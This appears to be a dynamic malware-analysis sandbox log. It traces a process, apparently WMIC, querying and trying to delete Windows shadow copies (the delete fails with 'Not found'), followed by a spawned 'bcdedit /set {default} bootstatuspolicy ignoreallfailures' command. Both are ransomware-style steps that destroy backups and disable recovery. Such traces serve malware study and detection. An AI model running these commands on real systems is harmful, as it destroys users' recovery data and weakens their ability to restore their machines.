lstrlenW (lpString="DELETE") returned 6 [0105.329] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0105.329] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.329] malloc (_Size=0x3e) returned 0x2dcac0 [0105.329] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.329] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select" [0105.329] malloc (_Size=0x18) returned 0x2dc930 [0105.329] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0105.329] lstrlenW (lpString="FROM") returned 4 [0105.329] lstrlenW (lpString="*") returned 1 [0105.329] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0105.329] malloc (_Size=0x18) returned 0x2dc8b0 [0105.329] free (_Block=0x2dc930) [0105.329] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50003a00780008 | out: _String=0x0, _Context=0x50003a00780008) returned="from" [0105.329] lstrlenW (lpString="FROM") returned 4 [0105.329] lstrlenW (lpString="from") returned 4 [0105.329] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0105.329] malloc (_Size=0x18) returned 0x2dc930 [0105.330] free (_Block=0x2dc8b0) [0105.330] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50003b00780008 | out: _String=0x0, _Context=0x50003b00780008) returned="Win32_ShadowCopy" [0105.330] malloc (_Size=0x18) returned 0x2dc8b0 [0105.330] free (_Block=0x2dc930) [0105.330] free (_Block=0x2dcac0) [0105.330] free (_Block=0x2dc8b0) [0105.330] lstrlenW (lpString="SET") returned 3 [0105.330] lstrlenW (lpString="DELETE") returned 6 [0105.330] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0105.330] lstrlenW (lpString="CREATE") returned 6 [0105.330] lstrlenW (lpString="DELETE") returned 6 [0105.330] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0105.330] free (_Block=0x2dc7f0) [0105.330] malloc (_Size=0x8) returned 0x2dcac0 [0105.330] lstrlenW (lpString="GET") returned 3 [0105.330] lstrlenW (lpString="DELETE") returned 6 [0105.330] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0105.330] lstrlenW (lpString="LIST") returned 4 [0105.330] lstrlenW (lpString="DELETE") returned 6 [0105.330] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0105.330] lstrlenW (lpString="ASSOC") returned 5 [0105.330] lstrlenW (lpString="DELETE") returned 6 [0105.330] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0105.330] WbemLocator:IUnknown:AddRef (This=0x1d71390) returned 0x3 [0105.330] free (_Block=0x2edfb0) [0105.330] lstrlenW (lpString="") returned 0 [0105.330] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.330] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0105.330] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.330] malloc (_Size=0x14) returned 0x2dc7f0 [0105.330] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.330] GetCurrentThreadId () returned 0x41c [0105.331] GetCurrentProcess () returned 0xffffffffffffffff [0105.331] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x28f700 | out: TokenHandle=0x28f700*=0x250) returned 1 [0105.331] GetTokenInformation (in: TokenHandle=0x250, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28f6f8 | out: TokenInformation=0x0, ReturnLength=0x28f6f8) returned 0 [0105.331] malloc (_Size=0x118) returned 0x2dcae0 [0105.331] GetTokenInformation (in: TokenHandle=0x250, TokenInformationClass=0x3, TokenInformation=0x2dcae0, TokenInformationLength=0x118, ReturnLength=0x28f6f8 | out: TokenInformation=0x2dcae0, ReturnLength=0x28f6f8) returned 1 [0105.331] AdjustTokenPrivileges (in: TokenHandle=0x250, DisableAllPrivileges=0, NewState=0x2dcae0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=773232372, Attributes=0x5d86), (Luid.LowPart=0x0, Luid.HighPart=3071920, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=939524923, Attributes=0x5d91), (Luid.LowPart=0x0, Luid.HighPart=2949464, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0105.331] free (_Block=0x2dcae0) [0105.331] CloseHandle (hObject=0x250) returned 1 [0105.331] lstrlenW (lpString="GET") returned 3 [0105.331] lstrlenW (lpString="DELETE") returned 6 [0105.331] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0105.331] lstrlenW (lpString="LIST") returned 4 [0105.331] lstrlenW (lpString="DELETE") returned 6 [0105.331] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0105.331] lstrlenW (lpString="SET") returned 3 [0105.331] lstrlenW (lpString="DELETE") returned 6 [0105.331] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0105.331] lstrlenW (lpString="CALL") returned 4 [0105.331] lstrlenW (lpString="DELETE") returned 6 [0105.331] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0105.331] lstrlenW (lpString="ASSOC") returned 5 [0105.331] lstrlenW (lpString="DELETE") returned 6 [0105.331] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0105.331] lstrlenW (lpString="CREATE") returned 6 [0105.331] lstrlenW (lpString="DELETE") returned 6 [0105.331] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0105.331] lstrlenW (lpString="DELETE") returned 6 [0105.331] lstrlenW (lpString="DELETE") returned 6 [0105.331] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0105.332] malloc (_Size=0x18) returned 0x2dc8b0 [0105.332] lstrlenA (lpString="") returned 0 [0105.332] malloc (_Size=0x2) returned 0x2edfb0 [0105.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff46314c, cbMultiByte=-1, lpWideCharStr=0x2edfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.332] free (_Block=0x2edfb0) [0105.332] malloc (_Size=0x18) returned 0x2dc930 [0105.332] lstrlenA (lpString="") returned 0 [0105.332] malloc (_Size=0x2) returned 0x2edfb0 [0105.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff46314c, cbMultiByte=-1, lpWideCharStr=0x2edfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.332] free (_Block=0x2edfb0) [0105.332] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.332] malloc (_Size=0x3e) returned 0x2dcae0 [0105.332] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.332] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select" [0105.332] malloc (_Size=0x18) returned 0x2dc9d0 [0105.332] free (_Block=0x2dc930) [0105.333] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50003f00680007 | out: _String=0x0, _Context=0x50003f00680007) returned="*" [0105.333] lstrlenW (lpString="FROM") returned 4 [0105.333] lstrlenW (lpString="*") returned 1 [0105.333] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0105.333] malloc (_Size=0x18) returned 0x2dc930 [0105.333] free (_Block=0x2dc9d0) [0105.333] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50004000680007 | out: _String=0x0, _Context=0x50004000680007) returned="from" [0105.333] lstrlenW (lpString="FROM") returned 4 [0105.333] lstrlenW (lpString="from") returned 4 [0105.333] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0105.333] malloc (_Size=0x18) returned 0x2dc9d0 [0105.333] free (_Block=0x2dc930) [0105.333] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50004100680007 | out: _String=0x0, _Context=0x50004100680007) returned="Win32_ShadowCopy" [0105.333] malloc (_Size=0x18) returned 0x2dc930 [0105.333] free (_Block=0x2dc9d0) [0105.333] free (_Block=0x2dcae0) [0105.333] malloc (_Size=0x18) returned 0x2dc9d0 [0105.333] malloc (_Size=0x18) returned 0x2dc8d0 [0105.333] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0105.333] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0105.333] free (_Block=0x2dc8b0) [0105.333] free (_Block=0x2dc9d0) [0105.333] ??0CHString@@QEAA@XZ () returned 0x28f670 [0105.333] GetCurrentThreadId () returned 0x41c [0105.333] malloc (_Size=0x18) returned 0x2dc9d0 [0105.333] malloc (_Size=0x18) returned 0x2dc8b0 [0105.334] malloc (_Size=0x18) returned 0x2dc950 [0105.334] malloc (_Size=0x18) returned 0x2dc970 [0105.334] malloc (_Size=0x18) returned 0x2dc990 [0105.334] SysStringLen (param_1="\\\\") returned 0x2 [0105.334] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0105.334] malloc (_Size=0x18) returned 0x2dc9b0 [0105.334] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0105.334] SysStringLen (param_1="\\") returned 0x1 [0105.334] malloc (_Size=0x18) returned 0x2dc9f0 [0105.334] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0105.334] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0105.334] free (_Block=0x2dc9b0) [0105.334] free (_Block=0x2dc990) [0105.334] free (_Block=0x2dc970) [0105.334] free (_Block=0x2dc950) [0105.334] free (_Block=0x2dc8b0) [0105.334] free (_Block=0x2dc9d0) [0105.334] malloc (_Size=0x18) returned 0x2dc9d0 [0105.334] malloc (_Size=0x18) returned 0x2dc8b0 [0105.334] malloc (_Size=0x18) returned 0x2dc950 [0105.334] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d71390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4d29d0 | out: ppNamespace=0xff4d29d0*=0x1d83c18) returned 0x0 [0105.340] free (_Block=0x2dc950) [0105.341] free (_Block=0x2dc8b0) [0105.341] free (_Block=0x2dc9d0) [0105.341] CoSetProxyBlanket (pProxy=0x1d83c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0105.341] free (_Block=0x2dc9f0) [0105.341] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0105.341] ??0CHString@@QEAA@XZ () returned 0x28f5c0 [0105.341] GetCurrentThreadId () returned 0x41c [0105.341] malloc (_Size=0x18) returned 0x2dc9f0 [0105.341] lstrlenA (lpString="") returned 0 [0105.341] malloc (_Size=0x2) returned 0x2edfb0 [0105.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff46314c, cbMultiByte=-1, lpWideCharStr=0x2edfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.341] free (_Block=0x2edfb0) [0105.341] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0105.341] SysStringLen (param_1="") returned 0x0 [0105.341] free (_Block=0x2dc9f0) [0105.341] malloc (_Size=0x18) returned 0x2dc9f0 [0105.341] IWbemServices:ExecQuery (in: This=0x1d83c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x28f5c8 | out: ppEnum=0x28f5c8*=0x1d83d18) returned 0x0 [0110.323] free (_Block=0x2dc9f0) [0110.323] CoSetProxyBlanket (pProxy=0x1d83d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0110.326] IEnumWbemClassObject:Next (in: This=0x1d83d18, lTimeout=-1, uCount=0x1, apObjects=0x28f5d0, puReturned=0x28f5e0 | out: apObjects=0x28f5d0*=0x1d83d80, puReturned=0x28f5e0*=0x1) returned 0x0 [0110.327] malloc (_Size=0x18) returned 0x2dc9f0 [0110.327] IWbemClassObject:Get (in: This=0x1d83d80, wszName="__PATH", lFlags=0, pVal=0x28f5f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f5f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.327] free (_Block=0x2dc9f0) [0110.327] malloc (_Size=0x800) returned 0x2dcae0 [0110.327] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x2dcae0, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0110.328] FormatMessageW (in: dwFlags=0x2500, lpSource=0x2dcae0, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x28f518, nSize=0x0, Arguments=0x28f528 | out: lpBuffer="넰\x11") returned 0x67 [0110.328] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0110.328] malloc (_Size=0x68) returned 0x2dd2f0 [0110.328] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x2dd2f0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0110.328] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff4d2ab0 [0110.328] fprintf (in: _File=0x7fefdb62ab0, _Format="%s" | out: _File=0x7fefdb62ab0) returned 103 [0110.330] fflush (in: _File=0x7fefdb62ab0 | out: _File=0x7fefdb62ab0) returned 0 [0110.330] free (_Block=0x2dd2f0) [0110.330] free (_Block=0x2dcae0) [0110.330] LocalFree (hMem=0x11b130) returned 0x0 [0110.330] IWbemServices:DeleteInstance (in: This=0x1d83c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x80041002 [0112.794] _CxxThrowException () [0112.796] IUnknown:Release (This=0x1d83d18) returned 0x0 [0112.805] IUnknown:Release (This=0x1d83d80) returned 0x0 [0112.805] malloc (_Size=0x20) returned 0x2dcae0 [0112.805] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0112.805] free (_Block=0x2dc930) [0112.805] free (_Block=0x2dc8d0) [0112.805] GetCurrentThreadId () returned 0x41c [0112.805] ??0CHString@@QEAA@PEBG@Z () returned 0x28f7a8 [0112.805] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x28f7a8 [0112.805] ??0CHString@@QEAA@XZ () returned 0x28f540 [0112.805] malloc (_Size=0x18) returned 0x2dc8d0 [0112.805] malloc (_Size=0x18) returned 0x2dc930 [0112.805] SysStringLen (param_1="") returned 0x0 [0112.805] free (_Block=0x2dc8d0) [0112.806] CoCreateInstance (in: rclsid=0xff4673c0*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff467390*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xff4d29f8 | out: ppv=0xff4d29f8*=0x1d71450) returned 0x0 [0112.808] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x1d71450, hRes=0x80041002, LocaleId=0x0, lFlags=0, MessageText=0x28f538 | out: MessageText=0x28f538*="Not found\r\n") returned 0x0 [0112.810] free (_Block=0x2dc930) [0112.810] malloc (_Size=0x18) returned 0x2dc930 [0112.810] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x1d71450, hRes=0x80041002, LocaleId=0x0, lFlags=0, MessageText=0x28f530 | out: MessageText=0x28f530*="WMI") returned 0x0 [0112.811] malloc (_Size=0x18) returned 0x2dc8d0 [0112.811] lstrlenW (lpString="WMI") returned 3 [0112.811] lstrlenW (lpString="Wbem") returned 4 [0112.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0112.811] lstrlenW (lpString="WMI") returned 3 [0112.811] lstrlenW (lpString="WMI") returned 3 [0112.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0112.811] WbemStatusCodeText:IUnknown:Release (This=0x1d71450) returned 0x0 [0112.812] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0112.812] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x28eda0, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0112.812] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28eda0, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x28ed70, nSize=0x0, Arguments=0x28ed78 | out: lpBuffer="㷰\r") returned 0x21 [0112.812] malloc (_Size=0x18) returned 0x2dc9f0 [0112.812] LocalFree (hMem=0xd3df0) returned 0x0 [0112.812] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Not found\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0112.812] malloc (_Size=0x22) returned 0x2dcb10 [0112.812] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Not found\r\n", cchWideChar=-1, lpMultiByteStr=0x2dcb10, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Not found\r\n", lpUsedDefaultChar=0x0) returned 34 [0112.812] fprintf (in: _File=0x7fefdb62ae0, _Format="%s" | out: _File=0x7fefdb62ae0) returned 33 [0112.812] fflush (in: _File=0x7fefdb62ae0 | out: _File=0x7fefdb62ae0) returned 0 [0112.812] free (_Block=0x2dcb10) [0112.813] free (_Block=0x2dc9f0) [0112.813] free (_Block=0x2dc8d0) [0112.813] free (_Block=0x2dc930) [0112.813] ??1CHString@@QEAA@XZ () returned 0x10169501 [0112.813] ??0CHString@@QEAA@PEBG@Z () returned 0x28f7a0 [0112.813] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x28f7a0 [0112.813] GetCurrentThreadId () returned 0x41c [0112.813] ??1CHString@@QEAA@XZ () returned 0x10169501 [0112.813] WbemLocator:IUnknown:Release (This=0x1d83c18) returned 0x0 [0112.816] ?Empty@CHString@@QEAAXXZ () returned 0x7fef2dc482c [0112.816] free (_Block=0x2dcae0) [0112.816] _kbhit () returned 0x0 [0112.819] free (_Block=0x2dcac0) [0112.819] free (_Block=0x2dc7d0) [0112.819] free (_Block=0x2dc7b0) [0112.819] free (_Block=0x2dc790) [0112.819] free (_Block=0x2dc770) [0112.819] free (_Block=0x2d6e70) [0112.819] free (_Block=0x2dc870) [0112.819] free (_Block=0x2d8600) [0112.819] free (_Block=0x2dc8f0) [0112.819] free (_Block=0x2dca40) [0112.819] free (_Block=0x2dc890) [0112.819] free (_Block=0x2dc910) [0112.819] free (_Block=0x2d6e00) [0112.819] free (_Block=0x2d6ce0) [0112.819] free (_Block=0x2dca90) [0112.820] ?Empty@CHString@@QEAAXXZ () returned 0x7fef2dc482c [0112.820] free (_Block=0x2d6ea0) [0112.820] free (_Block=0x2dc810) [0112.820] free (_Block=0x2dc830) [0112.820] free (_Block=0x2d7f80) [0112.820] free (_Block=0x2d63e0) [0112.820] free (_Block=0x2d6430) [0112.820] free (_Block=0x2dc7f0) [0112.820] free (_Block=0x2d6500) [0112.820] free (_Block=0x2d6cc0) [0112.820] free (_Block=0x2d8040) [0112.820] free (_Block=0x2d68a0) [0112.820] free (_Block=0x2d8000) [0112.820] free (_Block=0x2d6840) [0112.820] free (_Block=0x2d6860) [0112.820] free (_Block=0x2d6720) [0112.820] free (_Block=0x2d6740) [0112.820] free (_Block=0x2d66c0) [0112.820] free (_Block=0x2d66e0) [0112.820] free (_Block=0x2d6780) [0112.820] free (_Block=0x2d67a0) [0112.820] free (_Block=0x2d67e0) [0112.820] free (_Block=0x2d6800) [0112.820] free (_Block=0x2d6600) [0112.820] free (_Block=0x2d6620) [0112.820] free (_Block=0x2d65a0) [0112.820] free (_Block=0x2d65c0) [0112.820] free (_Block=0x2d6660) [0112.821] free (_Block=0x2d6680) [0112.821] free (_Block=0x2d6540) [0112.821] free (_Block=0x2d6560) [0112.821] free (_Block=0x2d64b0) [0112.821] free (_Block=0x2d6480) [0112.821] free (_Block=0x2d6d70) [0112.821] WbemLocator:IUnknown:Release (This=0x1d71390) returned 0x2 [0112.821] WbemLocator:IUnknown:Release (This=0x1d83b28) returned 0x0 [0112.821] WbemLocator:IUnknown:Release (This=0x1d83a98) returned 0x0 [0112.838] WbemLocator:IUnknown:Release (This=0x1d71390) returned 0x1 [0112.838] ?Empty@CHString@@QEAAXXZ () returned 0x7fef2dc482c [0112.838] WbemLocator:IUnknown:Release (This=0x1d71390) returned 0x0 [0112.838] free (_Block=0x2dc6f0) [0112.838] free (_Block=0x2dc710) [0112.838] free (_Block=0x2d8540) [0112.838] free (_Block=0x2dc730) [0112.838] free (_Block=0x2dc750) [0112.838] free (_Block=0x2d8580) [0112.838] free (_Block=0x2dc570) [0112.838] free (_Block=0x2dc590) [0112.838] free (_Block=0x2d83c0) [0112.838] free (_Block=0x2dc5b0) [0112.838] free (_Block=0x2dc5d0) [0112.838] free (_Block=0x2d8400) [0112.839] free (_Block=0x2dc4f0) [0112.839] free (_Block=0x2dc510) [0112.839] free (_Block=0x2d8340) [0112.839] free (_Block=0x2dc530) [0112.839] free (_Block=0x2dc550) [0112.839] free (_Block=0x2d8380) [0112.839] free (_Block=0x2dc670) [0112.839] free (_Block=0x2dc690) [0112.839] free (_Block=0x2d84c0) [0112.839] free (_Block=0x2dc6b0) [0112.839] free (_Block=0x2dc6d0) [0112.839] free (_Block=0x2d8500) [0112.839] free (_Block=0x2dc470) [0112.839] free (_Block=0x2dc490) [0112.839] free (_Block=0x2d82c0) [0112.839] free (_Block=0x2dc4b0) [0112.839] free (_Block=0x2dc4d0) [0112.839] free (_Block=0x2d8300) [0112.839] free (_Block=0x2dc5f0) [0112.839] free (_Block=0x2dc610) [0112.839] free (_Block=0x2d8440) [0112.839] free (_Block=0x2dc630) [0112.839] free (_Block=0x2dc650) [0112.840] free (_Block=0x2d8480) [0112.840] free (_Block=0x2dc3b0) [0112.840] free (_Block=0x2dc3d0) [0112.840] free (_Block=0x2d8200) [0112.840] free (_Block=0x2dc270) [0112.840] free (_Block=0x2dc290) [0112.840] free (_Block=0x2d80c0) [0112.840] free (_Block=0x2d6d30) [0112.840] free (_Block=0x2d6d50) [0112.840] free (_Block=0x2d8080) [0112.840] free (_Block=0x2dc2f0) [0112.840] free (_Block=0x2dc310) [0112.840] free (_Block=0x2d8140) [0112.840] free (_Block=0x2dc3f0) [0112.840] free (_Block=0x2dc410) [0112.840] free (_Block=0x2d8240) [0112.840] free (_Block=0x2dc2b0) [0112.840] free (_Block=0x2dc2d0) [0112.840] free (_Block=0x2d8100) [0112.840] free (_Block=0x2dc330) [0112.840] free (_Block=0x2dc350) [0112.840] free (_Block=0x2d8180) [0112.840] free (_Block=0x2dc370) [0112.840] free (_Block=0x2dc390) [0112.840] free (_Block=0x2d81c0) [0112.840] free (_Block=0x2dc430) [0112.841] free (_Block=0x2dc450) [0112.841] free (_Block=0x2d8280) [0112.841] CoUninitialize () [0113.250] exit (_Code=-2147217406) [0113.250] free (_Block=0x2d85c0) [0113.250] free (_Block=0x2d7c10) [0113.250] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0113.250] free (_Block=0x2d6e20) [0113.250] free (_Block=0x2d6520) [0113.250] free (_Block=0x2d7bd0) [0113.250] free (_Block=0x2d7b90) [0113.250] free (_Block=0x2d7b40) [0113.250] free (_Block=0x2d7b00) [0113.250] free (_Block=0x2d7aa0) [0113.250] free (_Block=0x2d5a90) [0113.250] free (_Block=0x2d5a50) [0113.250] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0113.250] free (_Block=0x2dc850) Thread: id = 41 os_tid = 0x82c Thread: id = 56 os_tid = 0x494 Thread: id = 59 os_tid = 0x828 Thread: id = 60 os_tid = 0x830 Thread: id = 61 os_tid = 0x834 Process: id = "10" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x6eec2000" os_pid = "0x56c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x4a0" cmd_line = "bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" 